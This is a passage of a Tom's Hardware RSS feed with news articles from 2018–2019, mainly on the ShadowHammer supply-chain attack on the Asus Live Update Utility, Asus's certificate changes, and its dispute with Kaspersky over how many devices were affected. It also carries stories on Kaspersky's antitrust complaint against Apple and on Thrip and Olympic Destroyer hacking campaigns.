                                <p>Earlier this year Kaspersky Labs <a href="https://www.tomshardware.com/news/asus-live-update-utility-shadowhammer-malware-cybersecurity,38910.html">revealed Operation ShadowHammer</a>, which used a modified version of the Asus Live Update Utility to compromise up to 1 million devices in what the security firm called "one of the biggest supply-chain incidents ever." Asus <a href="https://www.tomshardware.com/news/asus-responds-operation-shadowhammer-report-cybersecurity,38922.html">disputed the attack's scope</a>, but it also confirmed that the attack did happen, and <a href="https://www.asus.com/News/HYIZEHXIGeIRyrVT">today it announced</a> the adoption of a new digital certificate structure for its many software offerings.</p><figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:775px;"><p class="vanilla-image-block" style="padding-top:64.52%;"><img id="" name="" alt="Credit: Tom's Hardware" src="https://cdn.mos.cms.futurecdn.net/NNppct5qfTf99LvJJH7r55.jpg" mos="https://cdn.mos.cms.futurecdn.net/NNppct5qfTf99LvJJH7r55.jpg" align="" fullscreen="1" width="775" height="500" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/NNppct5qfTf99LvJJH7r55.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Tom's Hardware)</span></figcaption></figure><p>Operation ShadowHammer's malicious utility was hard to detect because it was the same size as the official version, hosted on Asus servers, and signed with a legitimate certificate. 
Now the company has said that it's implementing "a tiered certificate structure that upgrades the security infrastructure of our expanding software ecosystem" which "requires the current code-signing certificate of several Asus products to be revoked."</p><p>This won't be a seamless transition. Asus said that switching to the new certificate structure would cause Windows to warn people when they use certain utilities, or prevent that software from working normally when someone tries to launch the "Setup.exe" or "AsusSetup.exe" files. People will have to download new versions of the software affected by this change if they want everything to function the way they've grown accustomed to.</p><p>But the company didn't offer a complete list of utilities affected by this change--all it said was that Aura, AI Suite III and GPU Tweak II are on that list. All of the software updates are available <a href="https://www.asus.com/latest-software-update/">from a page</a> on the Asus website, but the complete list of affected offerings is hidden behind menus upon menus, so it's hard to tell exactly how many programs are affected by this change.</p><p>Asus said there are four scenarios where this change will affect its customers. The first is when people use its programs, which leads to the problems explained above. The second prevents the installation of third-party drivers from an Asus support CD unless someone runs "Setup.exe" instead of "AsusSetup.exe." The third can prevent the CD from loading in the first place. And the fourth occurs when Windows is booted up.</p><p>That last issue only affects people whose motherboards are running Armoury Crate or Q-installer. Asus said Windows will show a warning about running Armoury Crate at boot; the only ways to continue are to stop using Armoury Crate or update the BIOS. Here's how to do the latter:</p><p>"To do this, first restart your PC, and then press the Delete (Del) or F2 key when prompted during the startup process. 
Now navigate to the ‘Tools’ tab and then select the ‘ASUS Armoury Crate’ category. Then choose the ‘Disable the Download & Install ARMOURY CRATE app’ option. To save these changes and restart the system, press the F10 key, then press Y when prompted. Alternatively, navigate to the ‘Save and Exit’ option within the BIOS menu, press the Enter key, then press Y to save changes and restart."</p><p>Hopefully the new certificate structure justifies these (mostly minimal) hassles by preventing attacks like Operation ShadowHammer in the future. It won't completely solve Asus' problems--the <a href="https://www.tomshardware.com/news/asus-employees-expose-passwords-github,38943.html">company's employees reportedly exposed</a> their account credentials on GitHub--but at least it's a start.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Asus Reacts to Live Update Utility Hack (A Little Too Late) ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/asus-live-update-utility-software-hacked-update,38927.html</link>
                                                                            <description>
                            <![CDATA[ Asus issued a statement admitting its Live Update utility was hacked and said that it has issued a new version of its update tool that has been cleaned of the malware. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">seC3nfmRjJ3TuVbHVopafN</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/fVf3Rv4stkLmzwHeAYoe8Y-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 26 Mar 2019 23:44:01 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/fVf3Rv4stkLmzwHeAYoe8Y-1280-80.jpg">
                                                            <media:credit><![CDATA[Asus]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/fVf3Rv4stkLmzwHeAYoe8Y-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:755px;"><p class="vanilla-image-block" style="padding-top:60.00%;"><img id="" name="" alt="Credit: Asus" src="https://cdn.mos.cms.futurecdn.net/fVf3Rv4stkLmzwHeAYoe8Y.jpg" mos="https://cdn.mos.cms.futurecdn.net/fVf3Rv4stkLmzwHeAYoe8Y.jpg" align="" fullscreen="1" width="755" height="453" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/fVf3Rv4stkLmzwHeAYoe8Y.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Asus)</span></figcaption></figure><p><a href="https://www.asus.com/News/hqfgVUyZ6uyAyJe1">Asus acknowledged</a> today the recent <a href="https://www.tomshardware.com/news/asus-live-update-utility-shadowhammer-malware-cybersecurity,38910.html">takeover of its Live Update Utility</a> for the company’s notebooks by an advanced persistent threat (APT) group and said that it has released an updated version (version 3.6.8) of its utility that is clean of the hacking group’s malware. The company also included long overdue encryption and security features to prevent similar attacks in the future, such as end-to-end encryption and other verification mechanisms.</p><p>"A small number of devices have been implanted with malicious code through a sophisticated attack on our Live Update servers in an attempt to target a very small and specific user group. 
ASUS customer service has been reaching out to affected users and providing assistance to ensure that the security risks are removed," the statement said, in addition to offering <a href="https://dlcdnets.asus.com/pub/ASUS/nb/Apps_for_Win10/ASUSDiagnosticTool/ASDT_v1.0.1.0.zip">a link to download its diagnostic tool</a> and encouraging concerned users to contact customer service (without listing contact information). </p><h2 id="asus-live-update-utility-hacked-by-apt-group">Asus Live Update Utility Hacked by APT Group</h2><p>Kaspersky Labs this week announced it uncovered a sophisticated attack against Asus’ update software that was going on between June and November 2018. The security company called the attack the largest of its kind since a similar <a href="https://www.tomshardware.com/news/avast-unknowingly-bundled-malware-ccleaner,35477.html">takeover of CCleaner’s update server</a> happened, with up to 1 million users impacted.</p><p>According to a Bloomberg report earlier today, <a href="https://www.tomshardware.com/news/asus-responds-operation-shadowhammer-report-cybersecurity,38922.html">Asus said</a> the number of impacted users is in the hundreds, despite Kaspersky believing that up to 1 million were affected. However, Kaspersky was able to see that 57,000 of its own customers were using the infected tool, and as reported by <a href="https://motherboard.vice.com/amp/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers">Motherboard</a>, Symantec also said that 13,000 of its customers were using the hacked utility. Therefore, it seems that, at a minimum, 70,000 PCs were affected by the malicious hack, and those are only the devices that Kaspersky and Symantec were able to analyze.</p><p>Asus neglected to give credit to Kaspersky for discovering the attack in today's statement, and it appears that it also ignored Kaspersky's initial disclosure of the attack. 
Eventually, the company reportedly asked Kaspersky to <a href="https://twitter.com/KimZetter/status/1110167942749052928">sign an NDA</a>.</p><p>Kaspersky told Asus of the attack in January and <a href="https://securelist.com/operation-shadowhammer/89992/">published the story yesterday on Seclist</a> and its <a href="https://www.kaspersky.com/blog/shadow-hammer-teaser/26149/">blog</a>. Now, Asus has released a patch for its software, as well as a diagnostic tool for Asus notebook customers that want to verify whether or not their Live Update software was infected with malware.</p><h2 id="has-asus-learned-its-lesson">Has Asus Learned Its Lesson?</h2><p>Back in 2016, a report came out that revealed how the top 5 notebook makers, including Asus, were <a href="https://www.tomshardware.com/news/laptops-security-vulnerabilities,31963.html">ignoring security best practices</a> for their devices that would have prevented this type of attack. Asus, one of the worst offenders among the vulnerable laptop makers, was guilty of not even using HTTPS encryption or signing or validating their software updates.</p><p>At the time, the researchers that revealed this also found other critical vulnerabilities in these companies’ update tools that would have made it easy even for non-technical malicious hackers to infect targeted machines.</p><p>The chief of NSA’s TAO group also said in the past that exploiting OEMs’ software for notebooks is <a href="https://duo.com/assets/pdf/out-of-box-exploitation_oem-updaters.pdf">one of the easiest ways to hack a computer</a>, because of how vulnerable these software tools tend to be and how little care laptop vendors tend to have for security in general.</p><p>In this case, not only did Asus ignore this issue for the past three years despite being warned about it by security researchers, but the company seemingly ignored it once again when existing attacks and not just theoretical ones, were showed to it by Kaspersky.</p><p>Due to what seems to be 
mainly Kaspersky’s insistence on revealing the APT group’s attack to the public and fear of the press’ reaction, Asus was finally dragged kicking and screaming into updating its software with the proper modern security features that it should have used since at least 2016, after the aforementioned report came out.</p><p>The antivirus companies found Asus' update software to be vulnerable only for a limited period of time, but this may have been a strategy by the hacking group to minimize its exposure. However, chances are that Asus is not the only laptop maker whose PC utility has been infected, at least temporarily and undetected, by sophisticated hacking groups.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Asus Challenges Kaspersky's Operation ShadowHammer Numbers ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/asus-responds-operation-shadowhammer-report-cybersecurity,38922.html</link>
                                                                            <description>
                            <![CDATA[ Asus responded to Kaspersky Labs' report that an unidentified threat actor used the Asus Live Update Utility to compromise up to 1 million devices. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">gECCMaxzYZ8BJJPiW99aQJ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/npSr37TmnxCv68wZ2u6bug-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 26 Mar 2019 14:38:01 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:04 +0000</updated>
                                                                                                                                            <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/npSr37TmnxCv68wZ2u6bug-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/npSr37TmnxCv68wZ2u6bug-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1000px;"><p class="vanilla-image-block" style="padding-top:75.30%;"><img id="" name="" alt="Credit: Shutterstock" src="https://cdn.mos.cms.futurecdn.net/npSr37TmnxCv68wZ2u6bug.jpg" mos="https://cdn.mos.cms.futurecdn.net/npSr37TmnxCv68wZ2u6bug.jpg" align="" fullscreen="1" width="1000" height="753" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/npSr37TmnxCv68wZ2u6bug.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Shutterstock)</span></figcaption></figure><p>Asus has responded to <a href="https://www.kaspersky.com/blog/shadow-hammer-teaser/26149/">Kaspersky Labs' report</a> yesterday that an unidentified <a href="https://www.tomshardware.com/news/asus-live-update-utility-shadowhammer-malware-cybersecurity,38910.html">threat actor used the Asus Live Update Utility</a> to compromise up to 1 million devices. The cybersecurity company also released a diagnostics tool to help its customers figure out if they were affected by the attack and is reportedly contacting customers that it knows were affected to help them recover.</p><p>Kaspersky named the attack Operation ShadowHammer and said it was the largest supply chain attack since <a href="https://www.tomshardware.com/news/ccleaner-updates-without-notifying-users,37832.html">the CCleaner attack of 2017</a>, with 57,000 devices confirmed affected and more than 1 million believed to have been so. Why? To compromise just 600 yet-to-be-identified devices. 
(That's an extra 1,666 people affected for each actual target.)</p><p>The security company said that an attacker compromised the Asus Live Update Utility and distributed it to the manufacturer's devices. The malicious version of the utility was said to feature the same file size as the original, was signed with a legitimate certificate and was hosted on Asus' server. It would've been hard for anyone to spot.</p><p>Asus responded to Kaspersky's report late on the same day as the revelation. According <a href="https://www.bloomberg.com/news/articles/2019-03-26/pc-giant-asus-fell-prey-to-elaborate-2018-attack-kaspersky-says">to Bloomberg</a>, the company said that "only several hundred" PCs were infiltrated, not 1 million. It also said that it helped its customers fix the problem, patched the vulnerability that allowed the Asus Live Update Utility to be taken over and updated its servers after the attack.</p><p>We don't have enough information to say which company is more accurate. Both are likely to stick to their own findings: reporting on large-scale attacks helps security companies like Kaspersky advertise their services; manufacturers like Asus might want to downplay attacks to avoid the inevitable lawsuits, bad press and other issues.</p><p>Still, in <a href="https://motherboard.vice.com/amp/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers?__twitter_impression=true">Motherboard's report</a> on Operation ShadowHammer, the outlet noted that Symantec corroborated Kaspersky's findings.</p><p>We also haven't seen mention of Operation ShadowHammer on Asus' U.S. site--the company appears to be handling the issue as quietly as possible.</p><p>Kaspersky is set to reveal more information about the attack at the SAS 2019 conference on April 8.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Asus Live Update Utility Software Used to Deliver Malware ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/asus-live-update-utility-shadowhammer-malware-cybersecurity,38910.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky revealed that someone modified the Asus Live Update Utility to gain access to target devices in "one of the biggest supply-chain incidents ever." ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">LGia86mvM9sYSaseE6J4ZT</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/SRWFV3zpyqRAFM9GPeT5oZ-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 25 Mar 2019 14:36:01 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:06 +0000</updated>
                                                                                                                                            <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/SRWFV3zpyqRAFM9GPeT5oZ-1280-80.jpg">
                                                            <media:credit><![CDATA[Roman Arbuzov/Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/SRWFV3zpyqRAFM9GPeT5oZ-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1000px;"><p class="vanilla-image-block" style="padding-top:66.70%;"><img id="" name="" alt="Credit: Roman Arbuzov/Shutterstock" src="https://cdn.mos.cms.futurecdn.net/SRWFV3zpyqRAFM9GPeT5oZ.jpg" mos="https://cdn.mos.cms.futurecdn.net/SRWFV3zpyqRAFM9GPeT5oZ.jpg" align="" fullscreen="1" width="1000" height="667" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/SRWFV3zpyqRAFM9GPeT5oZ.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Roman Arbuzov/Shutterstock)</span></figcaption></figure><p>Kaspersky Labs <a href="https://www.kaspersky.com/blog/shadow-hammer-teaser/26149/">revealed today that</a> an unidentified threat actor modified the Asus Live Update Utility to gain access to target devices. The security firm said this attack, which it dubbed Operation ShadowHammer, "seems to be one of the biggest supply-chain incidents ever," after <a href="https://www.tomshardware.com/news/ccleaner-updates-without-notifying-users,37832.html">the CCleaner attack</a> of 2017.</p><p>The researchers said that someone modified the Asus Live Update Utility, added a back door and then distributed it via official channels. This malicious version of the tool was hosted on the Asus update server and signed with a legitimate certificate. It also had the same file size as the official version of the utility.</p><p>All those precautions made the malicious version of the Asus Live Update Utility incredibly difficult to detect. (Kaspersky managed it, though, which is why disclosures like these are also thinly veiled advertisements.) 
The company said it detected the malware on 57,000 devices but estimated that 1 million were affected.</p><p>Yet, the unidentified threat actor only appeared to be interested in a very small subset of those devices: Kaspersky said they "targeted only 600 specific MAC addresses, for which the hashes were hardcoded into different versions of the utility." That means as many as 1 million people were compromised to target just 600.</p><p>The supply chain attack was <a href="https://motherboard.vice.com/amp/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers?__twitter_impression=true">first reported by Motherboard</a>, which said it sent Asus three emails about Kaspersky's findings but had not received a response. The outlet noted that Symantec confirmed Kaspersky's findings and offered more details about how the researchers were finally able to uncover this attack.</p><p>Kaspersky said that "the same techniques were used against software from three other vendors" and added that it notified them about the attack, but it didn't say who the vendors are or how they responded. We suspect more information will be revealed after they've had a chance to protect their users.</p><p>More information about this attack is available on Kaspersky's <a href="https://securelist.com/operation-shadowhammer/89992/">Securelist</a> website. The company also plans to present more details about the attack at the SAS 2019 conference on April 8 in Singapore. It will publish a full report to Securelist at that time as well--hopefully with details about the three other vendors.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky: Apple Limited Our Parental Controls App to Promote Screen Time ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersy-vs-apple-antitrust-complaint-parental-screen-app,38868.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky filed an antitrust complaint against Apple, saying it removed features from its parental control app in order to favor Apple’s Screen Time app. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">7b2CWWondpM9HKGCGrJwS8</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/ehG7sEKKeprnEM9V7GMnpF-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 20 Mar 2019 16:56:01 +0000</pubDate>                                                                                                                                <updated>Wed, 05 Feb 2025 15:12:28 +0000</updated>
                                                                                                                                            <category><![CDATA[Antivirus]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                    <category><![CDATA[Security Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/ehG7sEKKeprnEM9V7GMnpF-1280-80.jpg">
                                                            <media:credit><![CDATA[Kaspersky]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/ehG7sEKKeprnEM9V7GMnpF-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1460px;"><p class="vanilla-image-block" style="padding-top:65.62%;"><img id="" name="" alt="Credit: Kaspersky" src="https://cdn.mos.cms.futurecdn.net/ehG7sEKKeprnEM9V7GMnpF.jpg" mos="https://cdn.mos.cms.futurecdn.net/ehG7sEKKeprnEM9V7GMnpF.jpg" align="" fullscreen="1" width="1460" height="958" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/ehG7sEKKeprnEM9V7GMnpF.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Kaspersky)</span></figcaption></figure><p>Kaspersky announced this week that it has <a href="https://www.kaspersky.com/blog/apple-fas-complaint/26017/">filed an antitrust complaint against Apple</a> with the Russian Federal Antimonopoly Service (FAS) over Apple's banning of features from the Kaspersky Safe Kids parental control app in the App Store. The cybersecurity company accused Apple of issuing the ban only after announcing its own parental control software for iOS users, Screen Time.</p><p>According to Kaspersky, it received a notice from Apple last year saying that the configuration profiles of the Kaspersky Safe Kids app were no longer meeting the requirements of the App Store’s policies. However, Kaspersky said Apple never had a problem with its application before this.</p><p>The removal and general ban of configuration profiles meant the elimination of two key features of Kaspersky’s app, app control and Safari browser blocking, Kaspersky said. According to the security firm, these features are essential. The first feature allows parents to block apps they don’t want their kids to run. 
The second one blocks all browsers on the device except for Kaspersky’s kid-safe browser.</p><h2 id="restrictions-following-launch-of-apple-screen-time">Restrictions Following Launch of Apple Screen Time</h2><p>Kaspersky said Apple blocked the features of its parental control app after launching its own version of a parental control application, Screen Time. Screen Time allows users to set application restrictions, such as when and for how long an app can be used throughout the day.</p><p>Kaspersky believes Apple's restrictions on the Safe Kids app following the launch of Screen Time constitute an abuse of power worthy of an antitrust complaint in Russia. Apple controls the distribution channel for iOS applications and can leverage this power to enter various markets -- in this case, the parental control software market. Kaspersky’s argument is that by banning or crippling competitors, Apple will become a monopoly in this or other markets.</p><p>"From our point of view, Apple appears to be using its position as platform owner and supervisor of the sole channel for delivering apps to users of the platform to dictate terms and prevent other developers from operating on equal terms with it. As a result of the new rules, developers of parental control apps may lose some of their users and experience financial impact," Kaspersky said in its blog post, adding that it "repeatedly" tried to contact Apple but did not reach any "meaningful negotiations."</p><h2 id="reining-in-on-monopolies">Reining In On Monopolies</h2><p><a href="https://www.tomshardware.com/news/kaspersky-antitrust-microsoft-european-union,34676.html">Kaspersky also filed an antitrust complaint against Microsoft</a> in 2017, accusing it of leveraging monopoly power in the PC market and using questionable tactics to promote its own Windows antivirus software over third-party ones. 
Eventually, Kaspersky withdrew the complaint.</p><p>This month, Spotify <a href="https://www.reuters.com/article/us-apple-spotify-tech-eu/spotify-files-eu-antitrust-complaint-against-apple-idUSKBN1QU18G">filed its own antitrust complaint</a> against Apple in the European Union over the high commission fee Apple charges music streaming service providers. Spotify’s argument is that Apple charges this fee while offering a similar service unimpeded by the same fee.</p><p>U.S. Senator Elizabeth Warren this month <a href="https://www.nytimes.com/2019/03/17/technology/google-facebook-amazon-antitrust.html">proposed</a> that large companies that become monopolies and own distribution channels should not be allowed to publish their own products on those platforms. The argument is that this incentivizes the platform owners to change the platform’s rules so that their own products are recommended above those of competitors.</p><p>The European Commission (EC) charged Google with something similar last year in the <a href="https://www.tomshardware.com/news/eu-fines-google-illegal-practices,37475.html">Android antitrust case</a>, as well as the <a href="https://www.bbc.com/news/technology-40406542">Google Shopping</a> antitrust case in 2017. In both of those cases, the EC accused Google of using its leverage over the platform to promote its own products. And this week, the <a href="https://www.tomshardware.com/news/google-eu-fine-online-advertising,38870.html">EU hit Google with a €1.5 billion fine</a> over online advertising practices.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ New Reports Say Hackers Targeting Defense Companies, Biochem Labs ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/global-hackers-target-defense-companies,37331.html</link>
                                                                            <description>
                            <![CDATA[ Reports by Symantec & Kaspersky reveal hacking groups are targeting satellite & defense companies in the US & Asia, and chemical/biological labs in Europe. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">zeoVJENdS8g7z43CAovhJj</guid>
                                                                                                                            <pubDate>Wed, 20 Jun 2018 15:04:02 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:11 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/haxMUaEZqfU93JRh9JXRNA.jpg ]]></dc:description>
                                                                                                                                                                                                                                                                        <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:600px;"><p class="vanilla-image-block" style="padding-top:66.67%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/RrGqKpcoCJicm8nL6fkB7F.jpg" mos="https://cdn.mos.cms.futurecdn.net/RrGqKpcoCJicm8nL6fkB7F.jpg" align="" fullscreen="1" width="600" height="400" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/RrGqKpcoCJicm8nL6fkB7F.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p>Hacking groups are getting busy--or perhaps <em>busier</em>. Symantec announced that attackers believed to be located in China have <a href="https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets">targeted satellite, telecommunications, and defense companies</a> in the U.S. and Southeast Asia. Meanwhile, researchers at Kaspersky revealed that the Olympic Destroyer group that targeted the Winter Olympic Games 2018 in Pyeongchang, South Korea, has <a href="https://securelist.com/olympic-destroyer-is-still-alive/86169/">set its sights on biological and chemical threat protection labs in Europe</a>.</p><p>The attacks discovered by Symantec are thought to be the work of Thrip, a hacking group the company has been tracking since 2013, and were traced back to three computers in China. Symantec discovered attacks on a satellite communications operator, a geospatial mapping company, three Southeast Asian telecom operators, and a U.S. defense contractor. All of these targets would be high priorities for China-sponsored attackers.</p><p>Hacks traced back to China are often motivated by corporate espionage. (Why bother going through R&D yourself when you can just steal another company's work?) 
Symantec believes these attacks may have a different motive--disrupting the companies' operations. Thrip is said to have specifically targeted devices that monitor and control satellites, for example, or which are used to develop custom geospatial applications.</p><p>Thrip is said to use a variety of readily available hacking tools and custom malware as part of its attacks. This mix of tools is supposed to make it harder to attribute the attacks to the group and effectively allow Thrip to hide in plain sight, to paraphrase Symantec. Still, the company said it's already protecting its customers from Thrip's attacks, and has advised its customers on the best ways to make sure the hacking group can't affect them.</p><p>Kaspersky's discovery <a href="https://securelist.com/olympic-destroyer-is-still-alive/86169/">is even less straightforward</a>. The company said it's observed attacks on Russia's financial sector, as well as organizations in Ukraine, the Netherlands, Germany, and other European countries. This seeming lack of focus raises several possibilities: the attackers could be targeting Russia's financial sector as a "false flag" or distraction tactic, for example, or they could be taking on jobs for various groups.</p><p>Regardless of the motivations, these attacks could still be damaging, and Kaspersky said they'll only get harder to attribute or defend against:</p><p>"The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies. The best thing we can do as researchers is to keep tracking threats like this. 
We will keep monitoring Olympic Destroyer and report on new discovered activities of this group."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Backdoor Accounts, Security Vulnerabilities Found In D-Link DIR-620 Routers ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/d-link-dir-620-backdoors-security-vulnerabilities,37106.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky researchers find two backdoors and two security vulnerabilities in D-Link's DIR-620 routers. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">tPp2ZcDJbnQ7oMkM3dgFYY</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/AX6agd8Kwv6VRucBHtAcdj-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 24 May 2018 13:55:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/AX6agd8Kwv6VRucBHtAcdj-1280-80.jpg">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/AX6agd8Kwv6VRucBHtAcdj-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
